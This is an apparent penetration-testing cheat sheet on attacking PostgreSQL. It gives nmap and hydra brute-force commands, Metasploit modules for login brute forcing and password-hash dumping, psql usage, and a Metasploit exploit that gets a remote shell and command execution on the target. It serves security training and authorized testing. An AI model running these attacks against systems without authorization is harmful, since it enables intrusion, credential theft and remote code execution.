Exploit Notes

PostgreSQL Pentesting

Last modified: 2023-03-09

Database

PostgreSQL a relational database management system. Default port is 5432.

Enumeration

nmap --script pgsql-brute -p 5432 <target-ip>

Brute Force Credentials

hydra -l username -P passwords.txt <target-ip> postgres
hydra -L usernames.txt -p password <target-ip> postgres

# Metasploit
msfconsole
msf> use auxiliary/scanner/postgres/postgres_login
msf> set rhosts <target-ip>
msf> run

Dump User Hashes

msfconsole
msf> use auxiliary/scanner/postgres/postgres_hashdump
msf> set rhosts <target-ip>
msf> set username <username>
msf> set password <password>
msf> run

Connect

Remote

# -W: Force password prompt
psql -h <target-ip> -p <target-port> -d <database> -U <username> -W
# -w: No password
psql -h <target-ip> -p <target-port> -d <database> -U <username> -w

Commands in psql

# Print help
\?

# Print the version of PostgreSQL
select version();

# Display command history
\s

# List databases
\l

# Switch to the given database
\c <database_name>

# List tables
\dt

# Descibe the table information
\d <table_name>

# Get values in the table
select * from <table>;

# List all users
\du

# Exit psql shell
\q

Get a Shell and Command Execution

msfconsole
msf> use exploit/multi/postgres/postgres_copy_from_program_cmd_exec
msf> set rhosts <target-ip>
msf> set lhost <local-ip>
msf> set tablename <table_name>
msf> set username <username>
msf> set password <password>
msf> run
shell

Tools by HDKS

Fuzzagotchi

Automatic web fuzzer.

aut0rec0n

Auto reconnaissance CLI.

Hash Cracker

Hash identifier.